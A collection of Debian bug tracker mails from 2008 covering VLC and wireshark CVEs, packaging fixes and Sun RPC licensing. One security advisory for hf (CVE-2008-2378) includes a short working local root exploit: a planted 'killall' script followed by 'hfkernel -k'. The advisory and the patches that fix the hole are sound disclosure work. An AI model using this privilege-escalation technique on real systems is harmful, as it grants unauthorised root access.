Your message dated Wed, 05 Nov 2008 22:32:18 + with message-id <[EMAIL PROTECTED]> and subject line Bug#503118: fixed in vlc 0.8.6.h-4+lenny1 has caused the Debian Bug report #503118, regarding vlc: CVE-2008-4686 integer overflow in ty parsing to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 503118: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=503118 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems --- Begin Message --- Package: vlc-nox Version: 0.8.6.h-4 Severity: grave File: libty_plugin Tags: security Justification: user security hole VLC versions 0.8.2 through 0.9.4 are prone to an exploitable stack-based buffer overflow in the TY (TiVo) file parser. See also http://www.videolan.org/security/sa0809.html N.B.: please give me the CVE ID if you allocate one. -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (100, 'unstable'), (100, 'testing') Architecture: i386 (i686) Kernel: Linux 2.6.27 (SMP w/2 CPU cores) Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages vlc-nox depends on: ii liba52-0.7.4 0.7.4-11 library for decoding ATSC A/52 str ii libasound2 1.0.16-2 ALSA library ii libavahi-client3 0.6.23-2 Avahi client library ii libavahi-common3 0.6.23-2 Avahi common library ii libavc1394-0 0.5.3-1+b1control IEEE 1394 audio/video devi ii libavcodec51 0.svn20080206-14 ffmpeg codec library ii libavformat52 0.svn20080206-14 ffmpeg file format library ii libavutil490.svn20080206-14 ffmpeg utility library ii libc6 2.7-15GNU C Library: Shared libraries ii libcdio7 0.78.2+dfsg1-3library to read and control CD-ROM ii libdbus-1-31.2.1-3 simple interprocess messaging syst ii libdvbpsi4 0.1.5-3.1 library for MPEG TS and DVB PSI ta ii libdvdnav4 4.1.2-3 DVD navigation library ii libdvdread30.9.7-11 library for reading DVDs ii libebml0 0.7.7-3.1 access library for the EBML format ii libfaad0 2.6.1-3.1 freeware Advanced Audio Decoder - ii libflac8 1.2.1-1.2 Free Lossless Audio Codec - runtim ii libfreetype6 2.3.7-2 FreeType 2 font engine, shared lib ii libfribidi00.10.9-1 Free Implementation of the Unicode ii libgcc11:4.3.2-1 GCC support library ii libgcrypt111.4.1-1 LGPL Crypto library - runtime libr ii libgnutls262.4.2-1 the GNU TLS library - runtime libr ii libhal10.5.11-5 Hardware Abstraction Layer - share ii libid3tag0 0.15.1b-10ID3 tag reading library from the M ii libiso9660-5 0.78.2+dfsg1-3library to work with ISO9660 files ii liblircclient0 0.8.3-3 infra-red remote control support - ii libmad00.15.1b-3 MPEG audio decoder library ii libmatroska0 0.8.1-1.1 extensible open standard audio/vid ii libmodplug0c2 1:0.8.4-2 shared libraries for mod music bas ii libmpcdec3 1.2.2-1 Musepack (MPC) format library ii libmpeg2-4 0.4.1-3 MPEG1 and MPEG2 video decoder libr ii libncurses55.6+20081011-1shared libraries for terminal hand ii libogg01.1.3-4 Ogg Bitstream Library ii libpng12-0 1.2.27-2 PNG library - runtime ii libpostproc51 0.svn20080206-14 ffmpeg video postprocessing librar ii libraw1394-8 1.3.0-4 library for direct access to IEEE ii libsmbclient 2:3.2.3-3 shared library that allows applica ii libspeex1 1.2~rc1-1 The Speex codec runtime library ii libstdc++6 4.3.2-1 The GNU Standard C++ Library v3 ii libsysfs2 2.1.0-5 interface library to sysfs ii libtheora0 1.0~beta3-1 The Theora Video Compression Codec ii libtwolame00.3.12-1 MPEG Audio Layer 2 encoding librar ii libvcdinfo00.7.23-4 library to extract information fro ii libvlc00.8.6.h-4 multimedia player and streamer lib ii libvorbis0a1.2.0.dfsg-3.1The Vorbis General Audio Compressi ii libvorbisenc2 1.2.0.dfsg-3.1The Vorbis General A
Bug#382175: Sun RPC libraries and other stories
On Wed, Nov 05, 2008 at 03:32:35PM -0600, Ean Schuessler wrote: > I'm here at ApacheCon with Simon Phipps and he said that Sun would be > "delighted to help Debian resolve the RPC licensing problems". He > wanted to note that the Free Software Definition did not exist at the > time when Sun released to the community and they couldn't have > predicted that it would violate the DFSG. Considering when it was > released, its very open. He also noted that Sun hasn't pursued any > legal action in all this time and that is a good indicator of their > position on the whole thing. > > All we need to do is get Simon a diff of what changes we need made and > he will help us make the arrangements. In short, Sun is all for Debian > keeping the RPC code in libc6 or the kernel and will do what is > necessary to make it happen. Assuming Sun is the sole copyright holder of that code, he could advise their IP laywers/whoever to relicense the code; either to the glibc license (LGPL-1.2 or later, currently), or perhaps the BSD license. The latter would probably be best for portmap as well, considering is is BSD licensed. If Sun does not want to relicense to BSD/LGPL this code due to their corporate licensing strategy, but still want to see the code remain in Debian's glibc/portmap, they should propose a compatible license they like I'd say. Thanks for working on this, let's hope we can resolve this in time for Lenny! regards, Michael -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#502824: alevt: diff for NMU version 1:1.6.1-10.2
Mark Purcell wrote: > > I have prepared and uploaded it *3* times, both to the SSH queue on > > ravel and via FTP; every time the upload simply disappears. > > Thats a bit weird ;-( Fourth time lucky - this time the upload was ACCEPTED. -release, please unblock alevt/1:1.6.1-10.2. The associated changelog entry is: alevt (1:1.6.1-10.2) unstable; urgency=medium * Non-maintainer upload. * Use correct patch to prevent installation failing in postinst - MAKEDEV will take care of creating devices in /dev/.static when it detects that udev is active. Thanks to Adeodato Simó for the updated patch. (Closes: #502824) Regards, -- ,''`. : :' : Chris Lamb `. `'` [EMAIL PROTECTED] `- signature.asc Description: PGP signature
Processed: tagging 504639
Processing commands for [EMAIL PROTECTED]: > tags 504639 + pending Bug#504639: vlc: buffer overflow in CUE support Tags were: security Tags added: pending > End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#502824: marked as done (alevt: piuparts test fails: /var/lib/dpkg/info/alevt.postinst: line 16: ./MAKEDEV: No such file or directory)
Your message dated Wed, 05 Nov 2008 21:47:03 + with message-id <[EMAIL PROTECTED]> and subject line Bug#502824: fixed in alevt 1:1.6.1-10.2 has caused the Debian Bug report #502824, regarding alevt: piuparts test fails: /var/lib/dpkg/info/alevt.postinst: line 16: ./MAKEDEV: No such file or directory to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 502824: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=502824 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems --- Begin Message --- Package: alevt Version: 1:1.6.1-10 Severity: serious User: [EMAIL PROTECTED] Usertags: piuparts-20081020 piuparts Hi, During tests using piuparts of all packages in lenny, I ran into the following problem: > Reading package lists... > Building dependency tree... > Reading state information... > The following packages were automatically installed and are no longer > required: > libgc1c2 > Use 'apt-get autoremove' to remove them. > The following extra packages will be installed: > libpng12-0 libvolume-id0 libx11-6 libx11-data libxau6 libxcb-xlib0 libxcb1 > libxdmcp6 udev > The following NEW packages will be installed: > alevt libpng12-0 libvolume-id0 libx11-6 libx11-data libxau6 libxcb-xlib0 > libxcb1 libxdmcp6 udev > 0 upgraded, 10 newly installed, 0 to remove and 0 not upgraded. > Need to get 1456kB of archives. > After this operation, 6349kB of additional disk space will be used. > WARNING: The following packages cannot be authenticated! > libvolume-id0 udev libpng12-0 libxau6 libxdmcp6 libxcb1 libxcb-xlib0 > libx11-data libx11-6 alevt > Authentication warning overridden. > Get:1 http://127.0.0.1 lenny/main libvolume-id0 0.125-7 [76.1kB] > Get:2 http://127.0.0.1 lenny/main udev 0.125-7 [253kB] > Get:3 http://127.0.0.1 lenny/main libpng12-0 1.2.27-2 [166kB] > Get:4 http://127.0.0.1 lenny/main libxau6 1:1.0.3-3 [11.9kB] > Get:5 http://127.0.0.1 lenny/main libxdmcp6 1:1.0.2-3 [17.0kB] > Get:6 http://127.0.0.1 lenny/main libxcb1 1.1-1.1 [43.1kB] > Get:7 http://127.0.0.1 lenny/main libxcb-xlib0 1.1-1.1 [15.1kB] > Get:8 http://127.0.0.1 lenny/main libx11-data 2:1.1.5-2 [169kB] > Get:9 http://127.0.0.1 lenny/main libx11-6 2:1.1.5-2 [623kB] > Get:10 http://127.0.0.1 lenny/main alevt 1:1.6.1-10 [81.7kB] > debconf: delaying package configuration, since apt-utils is not installed > Fetched 1456kB in 0s (5256kB/s) > Can not write log, openpty() failed (/dev/pts not mounted?) > Selecting previously deselected package libvolume-id0. > (Reading database ... 5777 files and directories currently installed.) > Unpacking libvolume-id0 (from .../libvolume-id0_0.125-7_i386.deb) ... > Selecting previously deselected package udev. > Unpacking udev (from .../archives/udev_0.125-7_i386.deb) ... > Selecting previously deselected package libpng12-0. > Unpacking libpng12-0 (from .../libpng12-0_1.2.27-2_i386.deb) ... > Selecting previously deselected package libxau6. > Unpacking libxau6 (from .../libxau6_1%3a1.0.3-3_i386.deb) ... > Selecting previously deselected package libxdmcp6. > Unpacking libxdmcp6 (from .../libxdmcp6_1%3a1.0.2-3_i386.deb) ... > Selecting previously deselected package libxcb1. > Unpacking libxcb1 (from .../libxcb1_1.1-1.1_i386.deb) ... > Selecting previously deselected package libxcb-xlib0. > Unpacking libxcb-xlib0 (from .../libxcb-xlib0_1.1-1.1_i386.deb) ... > Selecting previously deselected package libx11-data. > Unpacking libx11-data (from .../libx11-data_2%3a1.1.5-2_all.deb) ... > Selecting previously deselected package libx11-6. > Unpacking libx11-6 (from .../libx11-6_2%3a1.1.5-2_i386.deb) ... > Selecting previously deselected package alevt. > Unpacking alevt (from .../alevt_1%3a1.6.1-10_i386.deb) ... > Can not write log, openpty() failed (/dev/pts not mounted?) > Setting up libvolume-id0 (0.125-7) ... > Setting up udev (0.125-7) ... > unable to open device '/class/net/*' > A chroot environment has been detected, udev not started. > Setting up libpng12-0 (1.2.27-2) ... > Setting up libxau6 (1:1.0.3-3) ... > Setting up libxdmcp6 (1:1.0.2-3) ... > Setting up libxcb1 (1.1-1.1) ... > Setting up libxcb-xlib0 (1.1-1.1) ... > Setting up libx11-data (2:1.1.5-2) ... > Setting up libx11-6 (2:1.1.5-2) ... > Setting up alevt (1:1.6.1-10) ... > creating video4linux devices in /dev... > /var/lib/dpkg/info/alevt.postinst: line 16: ./MAKEDEV: No such file or > directory > dpkg: error processing alevt (--configure): >subprocess post-installation script returned error exit status 1 > Errors wer
Bug#382175: Sun RPC libraries and other stories
I'm here at ApacheCon with Simon Phipps and he said that Sun would be "delighted to help Debian resolve the RPC licensing problems". He wanted to note that the Free Software Definition did not exist at the time when Sun released to the community and they couldn't have predicted that it would violate the DFSG. Considering when it was released, its very open. He also noted that Sun hasn't pursued any legal action in all this time and that is a good indicator of their position on the whole thing. All we need to do is get Simon a diff of what changes we need made and he will help us make the arrangements. In short, Sun is all for Debian keeping the RPC code in libc6 or the kernel and will do what is necessary to make it happen. -- Ean Schuessler, CTO Brainfood.com [EMAIL PROTECTED] - http://www.brainfood.com - 214-720-0700 x 315 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Processed: tagging 503589
Processing commands for [EMAIL PROTECTED]: > tags 503589 patch Bug#503589: wireshark: CVE-2008-46[80-85] multiple security issues Tags were: security Tags added: patch > End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#503589: Wireshark CVE patches
On Monday 03 November 2008 04:44:42 Stefan Lesicnik wrote: > I have uploaded 3 debdiffs for the CVE's for Ubuntu - these are > currently awaiting review Stefan, Thanks for your work on this. Frederic, Joost, Are you in a position to upload a fixed package to fix this RC bug in lenny? Mark -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Processed: add patch tag
Processing commands for [EMAIL PROTECTED]: > tag 503543 patch Bug#503543: ptex-bin: fail to remove and break etch-to-lenny upgrade. There were no tags set. Tags added: patch > thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504182: marked as done (hf: CVE-2008-2378 insecure system call leading to local root)
Your message dated Wed, 05 Nov 2008 21:02:48 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#504182: fixed in hf 0.8-8.1
has caused the Debian Bug report #504182,
regarding hf: CVE-2008-2378 insecure system call leading to local root
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)
--
504182: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504182
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Source: hf
Severity: grave
Tags: security
- Forwarded message from Steve Kemp <[EMAIL PROTECTED]> -
From: Steve Kemp <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
User-Agent: Mutt/1.5.17+20080114 (2008-01-14)
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: [Secure-testing-team] hf - CVE-2008-2378 - local root exploit
The hf package, Described by Debian as an amateur-radio protocol suite
using a soundcard as a modem, is a program that eventually becomes
setuid(0), and has a trivial security hole in it.
By default the package installs "/usr/bin/hfkernel" as a typical binary,
but when first started via the program "hf" the binary is changed to
be setuid(root).
This is demonstrated:
[EMAIL PROTECTED]:~$ hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. Be aware that this can be a security hole.
Please do as root "chmod 4755 /usr/bin/hfkernel".
or start this script again as root.
If you do start the program as root the permissions are changed:
[EMAIL PROTECTED]:~$ sudo hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. But be aware that this can be a security hole.
I will do this now "chmod 4755 /usr/bin/hfkernel".
For you, root, I will start only hfkernel for test purposes.
...
Now the program is setuid:
[EMAIL PROTECTED]:~$ ls -l /usr/bin/hfkernel
-rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel
Unfortunately the hfkernel program contains a trivial root hole:
int main(int argc, char *argv[])
{
// snip
while ((c = getopt(argc, argv, "a:M:c:klhip:m:nt:s:r:Rf23")) != -1)
switch (c) {
// snip
case 'k':
system ("killall hfkernel");
//
}
Creating ~/bin/killall is sufficient to gain root privileges.
[EMAIL PROTECTED]:~$ echo -e '#!/bin/sh\n/bin/sh' > ~bin/killall
[EMAIL PROTECTED]:~$ chmod 755 ~/bin/killall
[EMAIL PROTECTED]:~$ hfkernel -k
sh-3.2# id
uid=1000(skx) gid=1000(skx) euid=0(root)
This has been given the identifier CVE-2008-2378.
Below is the patch that I've come up with to fix this hole, which
is a simple pidfile approach. Unless anybody has any comments
I'll upload a fix for Etch on Monday/Tuesday.
Steve
--
--- hf-0.8/hfkernel/main.c 2006-12-22 10:44:23.0 +
+++ hf-0.8.orig/hfkernel/main.c 2008-11-01 10:33:44.0 +
@@ -7,19 +7,7 @@
* Copyright (C) 1996 Thomas Sailer ([EMAIL PROTECTED])
* Swiss Federal Institute of Technology (ETH), Electronics Lab
* modified by Gnther Montag
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation; either version 2 of the License, or
- * (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with this program; if not, write to the Free Software
- * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ * This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this p
Bug#504639: vlc: buffer overflow in CUE support
Package: vlc-nox Version: 0.8.6.h-4.1 Severity: grave Tags: security Justification: user security hole Hello, When parsing the header of an invalid CUE image file or an invalid RealText subtitle file, stack-based buffer overflows might occur: http://www.videolan.org/security/sa0810.html (I believe the RealText problem only affects experimental) Regargs. -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (100, 'unstable'), (100, 'testing') Architecture: i386 (i686) Kernel: Linux 2.6.27.4 (SMP w/2 CPU cores) Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages vlc-nox depends on: ii liba52-0.7.4 0.7.4-11 library for decoding ATSC A/52 str ii libasound2 1.0.16-2 ALSA library ii libavahi-client3 0.6.23-2 Avahi client library ii libavahi-common3 0.6.23-2 Avahi common library ii libavc1394-0 0.5.3-1+b1control IEEE 1394 audio/video devi ii libavcodec51 0.svn20080206-14 ffmpeg codec library ii libavformat52 0.svn20080206-14 ffmpeg file format library ii libavutil490.svn20080206-14 ffmpeg utility library ii libc6 2.7-15GNU C Library: Shared libraries ii libcdio7 0.78.2+dfsg1-3library to read and control CD-ROM ii libdbus-1-31.2.1-4 simple interprocess messaging syst ii libdvbpsi4 0.1.5-3.1 library for MPEG TS and DVB PSI ta ii libdvdnav4 4.1.2-3 DVD navigation library ii libdvdread30.9.7-11 library for reading DVDs ii libebml0 0.7.7-3.1 access library for the EBML format ii libfaad0 2.6.1-3.1 freeware Advanced Audio Decoder - ii libflac8 1.2.1-1.2 Free Lossless Audio Codec - runtim ii libfreetype6 2.3.7-2 FreeType 2 font engine, shared lib ii libfribidi00.10.9-1 Free Implementation of the Unicode ii libgcc11:4.3.2-1 GCC support library ii libgcrypt111.4.1-1 LGPL Crypto library - runtime libr ii libgnutls262.4.2-1 the GNU TLS library - runtime libr ii libhal10.5.11-6 Hardware Abstraction Layer - share ii libid3tag0 0.15.1b-10ID3 tag reading library from the M ii libiso9660-5 0.78.2+dfsg1-3library to work with ISO9660 files ii liblircclient0 0.8.3-3 infra-red remote control support - ii libmad00.15.1b-3 MPEG audio decoder library ii libmatroska0 0.8.1-1.1 extensible open standard audio/vid ii libmodplug0c2 1:0.8.4-2 shared libraries for mod music bas ii libmpcdec3 1.2.2-1 Musepack (MPC) format library ii libmpeg2-4 0.4.1-3 MPEG1 and MPEG2 video decoder libr ii libncurses55.6+20081025-1shared libraries for terminal hand ii libogg01.1.3-4 Ogg Bitstream Library ii libpng12-0 1.2.27-2 PNG library - runtime ii libpostproc51 0.svn20080206-14 ffmpeg video postprocessing librar ii libraw1394-8 1.3.0-4 library for direct access to IEEE ii libsmbclient 2:3.2.4-1 shared library that allows applica ii libspeex1 1.2~rc1-1 The Speex codec runtime library ii libstdc++6 4.3.2-1 The GNU Standard C++ Library v3 ii libsysfs2 2.1.0-5 interface library to sysfs ii libtheora0 1.0~beta3-1 The Theora Video Compression Codec ii libtwolame00.3.12-1 MPEG Audio Layer 2 encoding librar ii libvcdinfo00.7.23-4 library to extract information fro ii libvlc00.8.6.h-4.1 multimedia player and streamer lib ii libvorbis0a1.2.0.dfsg-3.1The Vorbis General Audio Compressi ii libvorbisenc2 1.2.0.dfsg-3.1The Vorbis General Audio Compressi ii libxml22.6.32.dfsg-4 GNOME XML library ii zlib1g 1:1.2.3.3.dfsg-12 compression library - runtime vlc-nox recommends no packages. vlc-nox suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#502706: predepends - adduser
Hi Chris, I am busy merging the xtell package and we have the same fix re. update-inetd being called in the preinst script. The other fix we have that is not included is that adduser should also be preinst, as it is also called in preinst. Otherwise our packages are the same. If you agree with this assesment, would it be possible for you to upload a new package, and then I will request a sync into Ubuntu. Thanks! -- Stefan Lesicnik Linux System Dynamics
Bug#504182: intent to NMU
Hi,
I intent to upload an NMU to fix this bug.
debdiff attached and archived on:
http://people.debian.org/~nion/nmu-diff/hf-0.8-8_0.8-8.1.patch
Cheers
Nico
--
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
diff -u hf-0.8/debian/changelog hf-0.8/debian/changelog
--- hf-0.8/debian/changelog
+++ hf-0.8/debian/changelog
@@ -1,3 +1,12 @@
+hf (0.8-8.1) unstable; urgency=high
+
+ * Non-maintainer upload by the Security Team.
+ * Fix local root security hole that is caused by an insecure call
+to the system function, thanks Steve Kemp for the patch
+(CVE-2008-2378; Closes: #504182).
+
+ -- Nico Golde <[EMAIL PROTECTED]> Wed, 05 Nov 2008 21:19:58 +0100
+
hf (0.8-8) unstable; urgency=low
* Remove asm/page.h include from util/reffreq.c. Closes: #479967.
only in patch2:
unchanged:
--- hf-0.8.orig/hfkernel/main.c
+++ hf-0.8/hfkernel/main.c
@@ -78,6 +78,11 @@
#include "alsa.h"
#endif /* HAVE_ALSA_ASOUNDLIB_H */
+#ifndef PID_FILE
+# define PID_FILE "/var/run/hfkernel.pid"
+#endif
+
+
/* - */
/* these variables take hfkernel's options */
@@ -154,6 +159,49 @@
}
}
+void kill_daemon()
+{
+ FILE *f;
+ int pid;
+
+ if (!(f = fopen (PID_FILE, "r")))
+{
+ errstr( SEV_FATAL, "Failed to read from PID file");
+ exit(1);
+}
+ fscanf (f, "%d", &pid);
+ fclose (f);
+
+kill( SIGKILL, pid );
+unlink( PID_FILE );
+exit(1);
+}
+
+
+int write_pid()
+{
+ char buf[20];
+ int fd;
+ long pid;
+
+ if ((fd = open (PID_FILE, O_CREAT | O_TRUNC | O_WRONLY, 0600)) == -1)
+ {
+errstr (SEV_FATAL, "cannot open pidfile for writing ");
+exit(1);
+ }
+else
+{
+ pid = getpid ();
+ snprintf (buf, sizeof (buf), "%ld", (long) pid);
+ if (write (fd, buf, strlen (buf)) != strlen (buf))
+{
+ errstr (SEV_FATAL, "cannot write to pidfile ");
+ exit(1);
+}
+ close(fd);
+ }
+ return pid;
+}
/* - */
@@ -529,8 +577,8 @@
break;
case 'k':
-system ("killall hfkernel");
-
+ kill_daemon();
+ break;
case 'l':
logging = 1;
break;
@@ -635,6 +683,7 @@
exit(1);
}
+
if (logging)
openlog("hfkernel", LOG_PID, LOG_DAEMON);
printf("hfkernel %s starting...\n", PACKAGE_VERSION);
@@ -699,6 +748,8 @@
printf("Note: hfkernel is only part of the hf package.\n");
printf("It is controlled by the graphic terminal hfterm. To start them both, use the start script hf. In newer linuxes (kernel 2.6...) we need the syntax\n ÂŽLD_ASDSUME_KERNEL=2.2.5 hftermÂŽ, this is already prepared in the hf script. \n");
+write_pid();
+
start_io_thread();
exit(0); }
pgpbDxy0OjLjd.pgp
Description: PGP signature
Bug#503543: nmu proposal
Hi,
attached is a first NMU proposal and a debdiff of the source.
Sven
--
If God passed a mic to me to speak
I'd say stay in bed, world
Sleep in peace
[The Cardigans - 03:45: No sleep]
diff -u ptex-bin-3.1.10+0.04b/debian/ptex-bin.preinst ptex-bin-3.1.10+0.04b/debian/ptex-bin.preinst
--- ptex-bin-3.1.10+0.04b/debian/ptex-bin.preinst
+++ ptex-bin-3.1.10+0.04b/debian/ptex-bin.preinst
@@ -46,7 +46,9 @@
dpkg-divert --package ptex-bin --add --rename --divert \
/usr/share/man/man1/tftopl.nonja.1.gz /usr/share/man/man1/tftopl.1.gz
-mktexlsr
+if [ -x "`which mktexlsr 2>/dev/null`" ]; then
+ mktexlsr
+fi
;;
diff -u ptex-bin-3.1.10+0.04b/debian/control ptex-bin-3.1.10+0.04b/debian/control
--- ptex-bin-3.1.10+0.04b/debian/control
+++ ptex-bin-3.1.10+0.04b/debian/control
@@ -8,7 +8,7 @@
Package: ptex-bin
Architecture: any
Replaces: platex
-Depends: ptex-base (>= 1:2.0-3), texlive-base-bin | tetex-bin (>= 2.0.2-17), texlive-math-extra | tetex-extra, ${shlibs:Depends}
+Depends: ptex-base (>= 1:2.0-3), texlive-base-bin, texlive-math-extra, ${shlibs:Depends}
Suggests: dvipsk-ja, jbibtex-bin, jmpost, mendexk
Conflicts: platex
Description: The ASCII pTeX binary files
@@ -33,7 +33,7 @@
Package: jmpost
Architecture: any
-Depends: ${shlibs:Depends}, texlive-base-bin | tetex-bin (>= 1.0.7+20011202-5.1)
+Depends: ${shlibs:Depends}, texlive-base-bin
Recommends: ptex-bin, dvipsk-ja
Description: Japanized MetaPost, a system for drawing pictures
This is jMetaPost, a Japanized MetaPost based on the original
diff -u ptex-bin-3.1.10+0.04b/debian/jbibtex-bin.postrm ptex-bin-3.1.10+0.04b/debian/jbibtex-bin.postrm
--- ptex-bin-3.1.10+0.04b/debian/jbibtex-bin.postrm
+++ ptex-bin-3.1.10+0.04b/debian/jbibtex-bin.postrm
@@ -27,9 +27,13 @@
mv /etc/texmf/texmf.d/60jbibtex.cnf /etc/texmf/texmf.d/60jbibtex.bak
- update-texmf
-
- mktexlsr
+ if [ -x "`which update-texmf 2>/dev/null`" ]; then
+ update-texmf
+ fi
+
+ if [ -x "`which mktexlsr 2>/dev/null`" ]; then
+ mktexlsr
+ fi
;;
diff -u ptex-bin-3.1.10+0.04b/debian/jmpost.postinst ptex-bin-3.1.10+0.04b/debian/jmpost.postinst
--- ptex-bin-3.1.10+0.04b/debian/jmpost.postinst
+++ ptex-bin-3.1.10+0.04b/debian/jmpost.postinst
@@ -25,7 +25,9 @@
case "$1" in
configure)
-mktexlsr
+ if [ -x "`which mktexlsr 2>/dev/null`" ]; then
+ mktexlsr
+ fi
ln -sf /usr/bin/jmpost /usr/bin/inijmpost
ln -sf /usr/bin/jmpost /usr/bin/virjmpost
diff -u ptex-bin-3.1.10+0.04b/debian/changelog ptex-bin-3.1.10+0.04b/debian/changelog
--- ptex-bin-3.1.10+0.04b/debian/changelog
+++ ptex-bin-3.1.10+0.04b/debian/changelog
@@ -1,3 +1,17 @@
+ptex-bin (3.1.10+0.04b-2.1) unstable; urgency=low
+
+ * Non-maintainer upload.
+ * Add a lot of if checks for mktexlsr, update-texmf and update-texmf
+in the maintainer scripts to ensure that they don't break during
+upgrades (Closes: #503543).
+ * Create /var/lib/texmf/web2c/ptex directory if it doesn't exist in
+ptex-bin.postinst. This will ensure working upgrades for etch->lenny
+in cases where the old tetex packages are still installed. The new
+fmtutil-sys from texlive is capable of creating this directory itself.
+ * Remove or'ed dependency on tetex packages.
+
+ -- Sven Hoexter <[EMAIL PROTECTED]> Wed, 05 Nov 2008 20:04:13 +0100
+
ptex-bin (3.1.10+0.04b-2) unstable; urgency=low
* Bumped to Standards-Version: 3.7.3.
diff -u ptex-bin-3.1.10+0.04b/debian/jmpost.postrm ptex-bin-3.1.10+0.04b/debian/jmpost.postrm
--- ptex-bin-3.1.10+0.04b/debian/jmpost.postrm
+++ ptex-bin-3.1.10+0.04b/debian/jmpost.postrm
@@ -19,11 +19,11 @@
case "$1" in
purge|remove)
- if mktexlsr --help >/dev/null 2>&1; then
- mktexlsr
- fi
+ if [ -x "`which mktexlsr 2>/dev/null`" ]; then
+ mktexlsr
+ fi
-;;
+ ;;
upgrade|failed-upgrade|abort-install|abort-upgrade|disappear)
diff -u ptex-bin-3.1.10+0.04b/debian/ptex-bin.postinst ptex-bin-3.1.10+0.04b/debian/ptex-bin.postinst
--- ptex-bin-3.1.10+0.04b/debian/ptex-bin.postinst
+++ ptex-bin-3.1.10+0.04b/debian/ptex-bin.postinst
@@ -37,7 +37,11 @@
EOF
fi
+
+if [ -x "`which update-texmf 2>/dev/null`" ]; then
update-texmf
+fi
+
# Generate /etc/texmf/fmt.d/30ptex.cnf
if [ ! -f /etc/texmf/fmt.d/30ptex.cnf ]; then
@@ -52,7 +56,11 @@
EOF
fi
+if [ -x "`which update-fmtutil 2>/dev/null`" ]; then
update-fmtutil
+fi
+
+if [ -x "`which mktexlsr 2>/dev/null`" ]; then
mktexlsr
# Run fmtutil and generate *.fmt
@@ -61,6 +69,14 @@
pdftex_formats=$TEXMF/web2c/pdftex
append_db=/usr/share/texmf/web2c/mktexupd
+#Make sure that the ptex directory exists
+#This is a workaround for etch->lenny upgrades with
+#fmtutil-sys from the old tetex packages
+if [ ! -d $ptex_formats ]; then
+ mkdir -p $ptex_formats
+fi
+
+
TEMPFILE=`tempfile -p ptex`
echo "Running fmtutil-sys. This may take some time
Bug#504627: neko: Did not remove conffiles when purged
